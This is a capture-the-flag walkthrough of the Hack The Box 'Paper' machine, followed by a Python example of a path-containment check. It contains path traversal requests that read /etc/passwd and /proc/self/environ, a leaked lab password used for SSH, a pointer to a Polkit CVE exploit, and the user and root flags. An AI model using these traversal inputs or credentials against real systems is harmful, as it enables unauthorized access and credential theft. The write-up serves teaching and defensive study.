# [Hack The Box] HTB—Paper

## 1. Information gathering

Let's begin by scanning

![](https://i.imgur.com/h6fZTnZ.png)

Useful information on ports 22, 80 and 443. The rest are filtered ports!

Let's check the hostname of the web server through the response header

```
$ curl -I http://10.10.11.143
```

![](https://i.imgur.com/D49MmSM.png)

Let's map this hostname in the `/etc/hosts` file and try to access the web server

```
# /etc/hosts
10.10.11.143 office.paper
```

## 2. Website exploitation

Let's open the website now

![](https://i.imgur.com/gh2WvOs.jpg)

The [Penetration Testing Kit add-on](https://addons.mozilla.org/en-US/firefox/addon/penetration-testing-kit/?utm_source=addons.mozilla.org&utm_medium=referral&utm_content=search) provided more details on its tech stack and more.

![](https://i.imgur.com/sTQfI6I.png)

Well, a new host!

![](https://i.imgur.com/vrdkuG7.jpg)

Let's add it too

```
# /etc/hosts
10.10.11.143 office.paper
10.10.11.143 chat.office.paper
```

Let's access it now

![](https://i.imgur.com/tVyilWr.png)

Let's create an account and log in

![](https://i.imgur.com/zzOXXxp.png)

```
recyclops file ../../../../../etc/passwd
```

![](https://i.imgur.com/u88spun.png)

```
recyclops file ../../../../../proc/self/environ
```

![](https://i.imgur.com/X0onGXF.png)

`dwight/Queenofblad3s!23`

Let's use these creds to open an SSH session on the system

```
ssh dwight@10.10.11.143
```

One, two, three: caught the user flag

![](https://i.imgur.com/BSq1wud.png)

user flag: `0edf5f0f21681b3ccefb4151bd9e1eb3`

## 3. Privilege Escalation

Let's download and execute our favorite Linux privilege escalation tool

```
wget https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas_linux_amd64
```

It caught a Polkit CVE

![](https://i.imgur.com/wPJJ8h3.png)

CVE-2021-3560 PoC: https://github.com/Almorabea/Polkit-exploit

Download and run the exploit on the machine

![](https://i.imgur.com/DCgCBPR.png)

Got the root flag :100:

![](https://i.imgur.com/2FfXU4F.png)

root flag: `f48bd0125f4411b932f0697bc8f4dff7`

![](https://i.imgur.com/1Zl9pVk.png)
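
The `recyclops file` requests in section 2 worked because the requested path was never confined to a base directory. As an added example (not part of the original writeup and not the bot's own code), this is the containment check a file-serving handler needs before opening anything. `resolve_inside`, `PathEscape` and the `sales` directory are hypothetical names, and the sample requests are constructed, with the two traversal strings taken from the page.

```python
import os
import tempfile
from pathlib import Path


class PathEscape(ValueError):
    """Requested path resolves outside the allowed base directory."""


def resolve_inside(base_dir, requested):
    """Return the real path of `requested` under `base_dir`, or raise PathEscape."""
    base = Path(base_dir).resolve(strict=True)
    if "\x00" in requested:
        raise PathEscape("NUL byte in path")
    # Join first, then resolve: this collapses ".." and follows symlinks,
    # so the comparison is made on the path the OS would actually open.
    target = (base / requested).resolve(strict=False)
    if target != base and base not in target.parents:
        raise PathEscape(f"{requested!r} resolves to {target}")
    return target


def check_samples():
    """Run constructed requests through the check; return {request: allowed?}."""
    results = {}
    with tempfile.TemporaryDirectory() as tmp:
        base = Path(tmp) / "sales"          # hypothetical share directory
        base.mkdir()
        (base / "report.txt").write_text("q3 numbers\n")
        os.symlink("/etc", base / "link")   # symlink pointing out of the base
        samples = [
            "report.txt",                        # legitimate request
            "../../../../../etc/passwd",         # request shown on the page
            "../../../../../proc/self/environ",  # request shown on the page
            "link/passwd",                       # symlink escape, no ".." at all
            "/etc/passwd",                       # absolute path replaces the base on join
        ]
        for s in samples:
            try:
                resolve_inside(base, s)
                results[s] = True
            except PathEscape:
                results[s] = False
    return results


if __name__ == "__main__":
    for req, ok in check_samples().items():
        print(f"{'ALLOW' if ok else 'DENY':5}  {req}")
```

Filtering the string for `..` alone would miss the symlink and absolute-path cases, which is why the check compares resolved paths.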